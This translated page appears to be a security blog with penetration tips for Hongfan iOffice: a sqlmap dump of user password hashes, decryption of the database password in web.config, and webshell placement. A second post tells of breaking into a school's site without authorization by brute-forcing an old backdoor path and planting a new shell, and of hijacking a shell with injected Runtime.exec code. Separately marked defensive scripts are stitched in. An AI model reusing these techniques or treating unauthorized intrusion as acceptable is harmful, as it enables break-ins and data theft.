Hongfan iOffice penetration-testing exploitation tips

Preface

Recently, while auditing the Hongfan iOffice .NET code, I found a great many vulnerabilities: several unauthenticated SQL injections, arbitrary file download in both the front end and the back end, arbitrary file write in the front end, an already-patched arbitrary file upload in the front end, and an arbitrary-user login vulnerability. So I am writing down my exploitation tips for Hongfan iOffice.

Hongfan iOffice exploitation tips

Problems encountered while testing Hongfan iOffice

User password decryption

Analysis

The default database for Hongfan iOffice is ioffice, the default username is ioffice, and the table holding user data is mrbaseinf.

So when we find a SQL injection and want to get into the back end, we run sqlmap directly:

```shell
python3 sqlmap.py -r 2.txt -D ioffice -T mrbaseinf -C "loginid,Pwd,sysSam,CheckSam" --dump
```

sqlmap (link)

Once we have the password, it is time to think about decrypting it.

Hongfan's default password hash is 96-E7-92-18-96-5E-B7-2C-92-A5-49-DD-5A-33-01-12, which corresponds to 111111.

This is actually md5(111111) with a - inserted after every two characters.

Analyzing the code shows that this algorithm is plain MD5, which is not reversible, so the only option is to strip the dashes and look the hash value up on cmd5 to get the plaintext.

cmd5 (link)

Of course cmd5 cannot find every hash; that is where sam comes in.

Note: sam stands for security account manager.

Hongfan's designers probably considered that the hash is irreversible and that a user who forgets their password could not recover it, so when designing the table they added the sysSam and checkSam fields. Simply put, once these two values are decoded they may be the plaintext of the pwd field.

Querying the default checkSam or sysSam values shows the following.

When updating with a SQL statement, a sysSam value is added as well.

Note: in this document the admin password is 111111.

So if the password cannot be decrypted, the best approach when overwriting the password is to also add a sysSam.

Exploitation summary

When using SQL injection to dump data and trying to get into the back end, this method can be used to try to decrypt the passwords.
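As an added example (mine, not the post's or Hongfan's code): reproducing the stored Pwd format in Python and using it to flag accounts that are still on the default password in a dump of mrbaseinf. The dash-separated upper-case hex is the layout .NET's BitConverter.ToString gives an MD5 digest; the sample rows are constructed.

```python
import hashlib

# Default credential hash quoted above: MD5("111111") as upper-case hex pairs joined by "-".
DEFAULT_PWD_HASH = "96-E7-92-18-96-5E-B7-2C-92-A5-49-DD-5A-33-01-12"


def ioffice_hash(password: str) -> str:
    """Reproduce the stored Pwd format: unsalted MD5, upper-case hex, a dash after every byte.

    That is exactly what .NET's BitConverter.ToString(byte[]) emits, which is why the
    dumped column reads "96-E7-92-..." rather than a plain 32-character hex string.
    """
    digest = hashlib.md5(password.encode("utf-8")).hexdigest().upper()
    return "-".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def strip_dashes(stored: str) -> str:
    """Convert the dashed column value to the plain lower-case hex form hash lookup sites expect."""
    return stored.replace("-", "").lower()


def audit_accounts(rows, candidates=("111111",)):
    """Flag accounts whose stored Pwd equals the hash of a known default/weak password.

    rows: iterable of (loginid, Pwd) pairs as dumped from mrbaseinf.
    candidates: plaintexts to test; "111111" is the product default named in the post.
    Returns {loginid: matched_plaintext}. Because the hash is unsalted, one lookup table
    covers every account at once, which is the weakness a per-user salt would remove.
    """
    lookup = {ioffice_hash(pw): pw for pw in candidates}
    return {loginid: lookup[stored.upper()] for loginid, stored in rows if stored.upper() in lookup}


# Constructed sample rows (not real data): admin still on the default, user1 on something else.
SAMPLE_ROWS = [
    ("admin", DEFAULT_PWD_HASH),
    ("user1", ioffice_hash("not-the-default-9f3")),
]

if __name__ == "__main__":
    print(audit_accounts(SAMPLE_ROWS))  # {'admin': '111111'}
```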

Decrypting dbpwd in the configuration file

Analysis

The .NET configuration file is web.config, and the database connection information is in the appSettings node.

Looking at the iOffice configuration file, we see that the database connection password is encrypted, so we need to decrypt it.

.NET loads web.config nodes through System.Web.Configuration.WebConfigurationManager.

To load appSettings, for example, you read WebConfigurationManager.AppSettings to get the relevant parameters from the configuration file.

Decompile the DLL files under /ioffice/bin with dnSpy.

dnSpy (link)

In iOWebCSP.dll, in the GetWebDbConnectString method of the iOWebCSP object, we can see how iOffice connects to the database.

At line 131 of that method there is this code:

```csharp
text3 = this.b(WebConfigurationManager.AppSettings["dbpwd"]);
```

After reading dbpwd, it calls the b method of the current object to decrypt it.

Following it, it turns out to be just DES encryption/decryption.

```csharp
// Decompiled from iOWebCSP.dll (names as produced by the decompiler).
// Decodes the base64 dbpwd value and decrypts it with the DES instance in this.des,
// whose key and IV are set in the iOWebCSP constructor.
private string b(string A_0)
{
    if (Operators.CompareString(A_0, "", false) == 0)
    {
        // Empty input: fall through and return "".
    }
    else
    {
        try
        {
            byte[] array = Convert.FromBase64String(A_0);
            return Encoding.UTF8.GetString(this.des.CreateDecryptor().TransformFinalBlock(array, 0, array.Length));
        }
        catch (Exception ex)
        {
            // Bad base64 or bad padding: fail closed with an empty string.
            return "";
        }
    }
    return "";
}
```

Following des, we find that the key and IV are initialized directly in the iOWebCSP constructor.

So we can write the decryption script directly.

With the plaintext password in hand, the next thing is of course to log in to the database.

In cnstr, server=. stands for server=127.0.0.1:1433, and database="ioffice"; we still do not know which user the database connection uses.

Keep reading.

The variable d is initialized directly in the constructor to ioffice, i.e. the current (default) database user is ioffice.

Finally, we connect to the database successfully.

Exploitation summary

With the iOffice arbitrary file download vulnerability, once web.config is obtained the password can be decrypted, and if port 1433 happens to be open you can go straight in.

When you have server access but cannot get into the back end, this method lets you connect to the database, then decrypt the user passwords and log in to the back end.
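As an added defender-side check (mine, not from the post or the product): parse a web.config and report whether appSettings is under ASP.NET protected configuration or still holds a secret the application decrypts itself, which, with the DES key sitting in iOWebCSP.dll, is no better than plaintext for anyone who can read both files. Both fragments are constructed; only the dbpwd key name comes from the post.

```python
import xml.etree.ElementTree as ET

# Constructed fragment modelled on the layout described above: the connection settings
# sit under <appSettings>, and dbpwd holds a value the application decrypts with a DES
# key compiled into iOWebCSP.dll. The base64 string is made up, not a real ciphertext.
UNPROTECTED = """<configuration>
  <appSettings>
    <add key="dbserver" value="." />
    <add key="dbname" value="ioffice" />
    <add key="dbpwd" value="ZmFrZS1jaXBoZXJ0ZXh0" />
  </appSettings>
</configuration>"""

# The same section after "aspnet_regiis -pe appSettings" with the DPAPI provider: the provider
# name is recorded on the section and its children are replaced by <EncryptedData>. The
# ciphertext is useless without that machine's DPAPI key, so a file-download bug alone no
# longer yields the password. The cipher value is truncated for the example.
PROTECTED = """<configuration>
  <appSettings configProtectionProvider="DataProtectionConfigurationProvider">
    <EncryptedData>
      <CipherData><CipherValue>AQAAANCMnd8BFdERjHoAwE...</CipherValue></CipherData>
    </EncryptedData>
  </appSettings>
</configuration>"""

# Key-name fragments that usually mark a secret; "dbpwd" is the one named in the post.
SECRET_KEY_HINTS = ("pwd", "password", "passwd", "secret")


def _local_name(tag: str) -> str:
    """Strip an XML namespace ({uri}Name -> Name); the RSA provider emits a namespaced element."""
    return tag.rsplit("}", 1)[-1]


def audit_app_settings(xml_text: str) -> dict:
    """Return {"protected": bool, "provider": str|None, "recoverable_secrets": [keys]}."""
    root = ET.fromstring(xml_text)
    section = root.find("appSettings")
    report = {"protected": False, "provider": None, "recoverable_secrets": []}
    if section is None:
        return report
    provider = section.get("configProtectionProvider")
    has_encrypted_data = any(_local_name(child.tag) == "EncryptedData" for child in section)
    if provider and has_encrypted_data:
        report["protected"] = True
        report["provider"] = provider
        return report
    for add in section.findall("add"):
        key = add.get("key") or ""
        if any(hint in key.lower() for hint in SECRET_KEY_HINTS):
            report["recoverable_secrets"].append(key)
    return report


if __name__ == "__main__":
    print(audit_app_settings(UNPROTECTED))
    print(audit_app_settings(PROTECTED))
```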

Webshell execution problem

Analysis

After finding the arbitrary file write and arbitrary file upload vulnerabilities during the audit (no renaming), I tried to exploit them. The default write and upload paths are both under /ioffice/upfiles/; code analysis and actual testing showed that files are not renamed.

At first I uploaded script files that .NET can execute (aspx, ashx, asmx) under /ioffice/upfiles/. Accessing them directly, I found they were redirected.

Note: the redirect happens whether or not the file exists.

Later another researcher told me that on Hongfan everyone uploads asp shells.

But actual testing showed that asp shells run with very low privileges, so a .NET shell was still needed.

Finally, testing showed that files can be uploaded to the /iOffice/Identity/ directory.

Exploitation summary

Just write the webshell across directories into /iOffice/Identity/.

Summary

Hongfan iOffice has few internet-facing deployments nowadays, and the code was probably written by the programmers of seven or eight years ago, so it has all kinds of vulnerabilities. Auditing the pitfalls left by predecessors improved my own understanding of vulnerable code, which was well worth it.

While auditing Hongfan OA, I also found a possible XXE vulnerability and a Newtonsoft.Json deserialization vulnerability. Unfortunately, because of the default configuration, exploitation was unsuccessful.


Landray OA (treexml.tmpl) RCE audit and exploitation

Vulnerability description

This is actually two vulnerabilities: a Spring Boot authorization bypass and a bsh RCE.

Read more
Yonyou NC bsh.servlet.BshServlet RCE exploitation method

Yonyou bsh RCE exploitation

Read more
Two unconventional ways of gaining access

Preface

At the beginning of May someone asked me to check whether the school she was transferring into for her bachelor's degree had any vulnerabilities, and at the end of May someone else asked me to look at the site his internship company had assigned him. So I am recording the unconventional approach used to gain access in these two cases.

Gaining access

Helping a girl gain access to her school

Early in May, one night, a girl messaged me asking how to bypass the change-password screen: after logging in with the initial password, the system forces you to set a new password that meets the complexity requirements.

Testing the reset flow, it returns to the login page rather than the back-end home page, so it cannot be bypassed by modifying keywords in the response or by visiting the back-end home URL directly.

At that age it is normal not to be able to sleep at night, so I took a look at the school for her.

Information gathering

She gave me some information about the school (such as a staff ID and the school's situation), and I wondered whether I could get access to one of its sites; after all, a security-services grunt who cannot get a shell is not a good security-services grunt.

During information gathering I found a site that might be exploitable.

A site suspected of being getshell-able

But testing showed there was no upload vulnerability here.

However, while analyzing the JS, I found an image-management API.

Here you can preview some of the images uploaded to the site.

Discovering traces of a previous intrusion

I also found files that looked like webshells.

The intrusions happened mainly in the middle of last year and at the start of this year.

And in one of the images I found webshell code (the time of writing differs from the time of testing, and part of the webshell found earlier has since been deleted).

So, a bold guess: a fairly skilled attacker had already gained access to this site.

Analyzing the upload path

From this we can tell that after a successful upload the file is saved on the server at /uploadfiles/<file extension>/<year-month>/<day>/<filename>.

So there may be a jsp or jspx shell on the server.

Analyzing the webshell backdoor path

Now access the following two targets directly:
http://x.x.x.x/uploadfiles/jsp
http://x.x.x.x/uploadfiles/jspx

The jspx directory exists, which shows that a jspx webshell was once uploaded to this site.

Then I used Burp to brute-force the date components, and then the shell path.

The date range to brute-force should be 2020 to 2022.

Brute-forcing found the year and month when the webshell was uploaded.

Continuing found the day.

Now only the webshell's filename was missing, so I brute-forced 1-9999 and hoped for the best.

Emmm, actually I should not have masked the earlier parts.

Unexpectedly, a jspx came out.

Successfully got a shell for her

Search GitHub directly for this title.

Let me just post the chat screenshots with her instead.

I then told her that, according to the history of vulnerability submissions for this school on the edu platform, there was no high-risk getshell vulnerability at that point in time, so this was a backdoor, uploaded maliciously and never reported.

Using the command-execution shell I wrote a Godzilla shell, connected directly, and found that many shells were present.

Finally, I hope she succeeds in getting into the bachelor's program.

Helping a guy gain access to a site

On Monday after the attack-defense exercise, another researcher messaged me asking me to look at a site; I was bored back at the hotel, so I took a look.

The target was one his internship company asked him to test, with restrictions: no uploading shells. They also gave a hint of an account name, but no password.

Information gathering

With no password, I looked at the login form and flow; there was a captcha, so I did not bother brute-forcing. I tried the usual weak passwords and got nowhere.

Analyzing the site structure

While analyzing the site's JS I found an upload API.

I tried it; not even a txt file could be uploaded, so it was unusable.

Continuing to look for APIs, I found an attachment-management API and accessed it directly.

Discovering historical webshells

After accessing the API, I searched directly for jsp to see whether any odd jsp files had been uploaded as attachments, and found files that looked like webshells.

And there were 6/2=3 of them.

Then I discussed it with him.

Now I needed a way to read the code of these three shells.

I then found there was also a file-download API.

I constructed the request directly and used the fileid from the attachment-management API to retrieve the webshell contents.

The first jsp seemed useless.

The second shell

I had not seen it before; a Baidu search showed it was an AntSword shell (don't you find those two characters, 蚁剑, especially hard to type?).

I tried connecting directly.

The connection was reset, so I thought of sending the command-execution code directly.

Trying command execution

Since AntSword could not connect directly to the target's webshell, I connected to a shell that AntSword can connect to normally.

Take this data, URL-decode it, then base64-decode it, and finally write it out to a .class bytecode file.


Write it out to a bytecode file:

```shell
echo 数据 |base64 -d > 1.class
```
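As an added detection example (mine, not from the post or AntSword): the decoding chain just described, URL-decode, drop the shell's short random prefix, base64-decode, check for the class-file magic 0xCAFEBABE, turned into a scanner for POST bodies. The magic base64-encodes to the text yv66vg, which is why base64-encoded class files in request logs start with that string. The sample body is constructed.

```python
import base64
import binascii
from urllib.parse import parse_qsl, quote

# Every Java class file starts with 0xCAFEBABE; in base64 those bytes become the text "yv66vg".
JAVA_CLASS_MAGIC = b"\xca\xfe\xba\xbe"
# The decompiled shell drops randomPrefix ("2") characters before decoding, so a
# detector must tolerate a short junk prefix in front of the base64 text.
MAX_JUNK_PREFIX = 8


def extract_class(value: str):
    """Return the class bytes if value is (junk prefix +) base64 of a class file, else None."""
    for skip in range(MAX_JUNK_PREFIX + 1):
        candidate = value[skip:]
        if len(candidate) < 12 or len(candidate) % 4:
            continue  # too short, or not a whole number of base64 quanta
        try:
            raw = base64.b64decode(candidate, validate=True)
        except (binascii.Error, ValueError):
            continue
        if raw.startswith(JAVA_CLASS_MAGIC):
            return raw
    return None


def find_class_payloads(form_body: str):
    """Scan a URL-encoded POST body and report parameters that carry a base64 class file.

    parse_qsl does the URL decoding (%2B, %2F, %3D), which is the first step the post
    performs by hand before piping the value through base64 -d.
    """
    findings = []
    for name, value in parse_qsl(form_body, keep_blank_values=True):
        raw = extract_class(value)
        if raw is None:
            continue
        minor = int.from_bytes(raw[4:6], "big")
        major = int.from_bytes(raw[6:8], "big")
        findings.append({"param": name, "length": len(raw), "class_version": f"{major}.{minor}"})
    return findings


# Constructed sample: a fake class file (magic + version 52.0, i.e. Java 8, then filler),
# base64-encoded, given a two-character junk prefix and URL-encoded the way the shell expects.
FAKE_CLASS = JAVA_CLASS_MAGIC + b"\x00\x00\x00\x34" + b"\x00" * 28
SAMPLE_B64 = base64.b64encode(FAKE_CLASS).decode("ascii")
SAMPLE_BODY = "passwd=" + quote("2x" + SAMPLE_B64) + "&page=1"

if __name__ == "__main__":
    print(find_class_payloads(SAMPLE_BODY))  # [{'param': 'passwd', 'length': 36, 'class_version': '52.0'}]
```

Because the magic is fixed, the literal text yv66vg in a URL-decoded parameter value is also a cheap log-search signature, with extract_class as the confirmation step.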

Then decompile 1.class with IDEA.

The code is as follows:

```java
// Decompiled from 1.class with IDEA (the class sent by AntSword; decompiler names kept).
package com.test;  

import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class Info {
public HttpServletRequest request = null;
public HttpServletResponse response = null;
public String encoder = "base64";
public String cs = "UTF8";
public String randomPrefix = "2";
public String decoderClassdata;

public Info() {
}

public boolean equals(Object var1) {
this.parseObj(var1);
StringBuffer var2 = new StringBuffer();
String var3 = "4c6d80d6c63e";
String var4 = "1c0ffed1";
String var5 = "vfc5430a64bb6";

try {
this.response.setContentType("text/html");
this.request.setCharacterEncoding(this.cs);
this.response.setCharacterEncoding(this.cs);
this.decoderClassdata = this.decode(this.request.getParameter(var5));
var2.append(this.SysInfoCode());
} catch (Exception var8) {
var2.append("ERROR:// " + var8.toString());
}

try {
this.response.getWriter().print(var3 + this.asoutput(var2.toString()) + var4);
} catch (Exception var7) {
}

return true;
}

String SysInfoCode() {
String var1 = System.getProperty("user.dir");
String var2 = System.getProperty("os.name");
String var3 = System.getProperty("user.name");
String var4 = this.WwwRootPathCode(var1);
return var1 + "\t" + var4 + "\t" + var2 + "\t" + var3;
}

String WwwRootPathCode(String var1) {
StringBuilder var2 = new StringBuilder();
if (!var1.startsWith("/")) {
try {
File[] var3 = File.listRoots();
File[] var4 = var3;
int var5 = var3.length;

for(int var6 = 0; var6 < var5; ++var6) {
File var7 = var4[var6];
var2.append(var7.toString(), 0, 2);
}
} catch (Exception var8) {
var2.append("/");
}
} else {
var2.append("/");
}

return var2.toString();
}

public void parseObj(Object var1) {
if (var1.getClass().isArray()) {
Object[] var2 = (Object[])((Object[])var1);
this.request = (HttpServletRequest)var2[0];
this.response = (HttpServletResponse)var2[1];
} else {
try {
Class var9 = Class.forName("javax.servlet.jsp.PageContext");
this.request = (HttpServletRequest)var9.getDeclaredMethod("getRequest").invoke(var1);
this.response = (HttpServletResponse)var9.getDeclaredMethod("getResponse").invoke(var1);
} catch (Exception var8) {
if (var1 instanceof HttpServletRequest) {
this.request = (HttpServletRequest)var1;

try {
Field var3 = this.request.getClass().getDeclaredField("request");
var3.setAccessible(true);
HttpServletRequest var4 = (HttpServletRequest)var3.get(this.request);
Field var5 = var4.getClass().getDeclaredField("response");
var5.setAccessible(true);
this.response = (HttpServletResponse)var5.get(var4);
} catch (Exception var7) {
try {
this.response = (HttpServletResponse)this.request.getClass().getDeclaredMethod("getResponse").invoke(var1);
} catch (Exception var6) {
}
}
}
}
}

}

public String asoutput(String var1) {
try {
byte[] var2 = this.Base64DecodeToByte(this.decoderClassdata);
Method var3 = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
var3.setAccessible(true);
Class var4 = (Class)var3.invoke(this.getClass().getClassLoader(), var2, 0, var2.length);
return var4.getConstructor(String.class).newInstance(var1).toString();
} catch (Exception var5) {
return var1;
}
}

String decode(String var1) throws Exception {
boolean var2 = false;

try {
int var5 = Integer.parseInt(this.randomPrefix);
var1 = var1.substring(var5);
} catch (Exception var4) {
var2 = false;
}

return this.encoder.equals("base64") ? new String(this.Base64DecodeToByte(var1), this.cs) : var1;
}

public byte[] Base64DecodeToByte(String var1) {
Object var2 = null;
String var3 = System.getProperty("java.version");

try {
Class var4;
byte[] var7;
if (var3.compareTo("1.9") >= 0) {
var4 = Class.forName("java.util.Base64");
Object var5 = var4.getMethod("getDecoder").invoke((Object)null);
var7 = (byte[])((byte[])var5.getClass().getMethod("decode", String.class).invoke(var5, var1));
} else {
var4 = Class.forName("sun.misc.BASE64Decoder");
var7 = (byte[])((byte[])var4.getMethod("decodeBuffer", String.class).invoke(var4.newInstance(), var1));
}

return var7;
} catch (Exception var6) {
return new byte[0];
}
}
}
```

Analyzing the code in detail was a hassle, so I went straight to finding a place where command output could be echoed back.

I found this method; it is used to test the connection and echoes the current user directory, the operating system type, and the user the server runs as.

So it is simple: replace the code of SysInfoCode with command-execution statements.

```java
Process p=Runtime.getRuntime().exec("whoami");  
InputStream ins= p.getInputStream();
StringBuilder stringBuilder = new StringBuilder();
String line=null;
InputStreamReader inputStreamReader=new InputStreamReader(ins);
BufferedReader bufferedReader=new BufferedReader(inputStreamReader);
while((line=bufferedReader.readLine())!=null){
stringBuilder.append(line).append("\n");
}
```

Then compile it into a .class bytecode file.

Then base64-encode the Info.class file.

Then URL-encode the data and send the request.

Successfully obtained root privileges on the website.

Executing the id command


Finally I told him that RCE had been achieved.

Summary

Gaining access does not have to go through vulnerabilities such as open ports, weak passwords, RCE, file upload, injection, or phishing. It can also be done by using information gathering to find historical webshell backdoors.

However, gaining access this way is costly, so it is not recommended and serves only as a line of thought.


Yuehai Cup: writeup of selected challenges

Yuehai Cup writeup

Read more
An arbitrary-user login found in a project

Records an arbitrary-user login vulnerability found in Huawei and China Mobile projects. It bypassed the password and captcha login policy, so only the username was needed to log in to the back end.

Read more
Applying encryption and decryption during penetration testing

Records a project in which the developers encrypted every parameter. By analyzing the front-end JS algorithm, I wrote encryption/decryption scripts and successfully exploited the broken-access-control and SQL injection vulnerabilities again.

Read more
2021 annual summary

Reflections on the time spent learning security.

Read more
From arbitrary file download to command execution

Obtaining source code by fuzzing in a Windows environment, and ultimately taking the server with SYSTEM privileges.

Read more
Yisi ESPCMS (P8.21012001 stable version) code audit

PHP code audit

Read more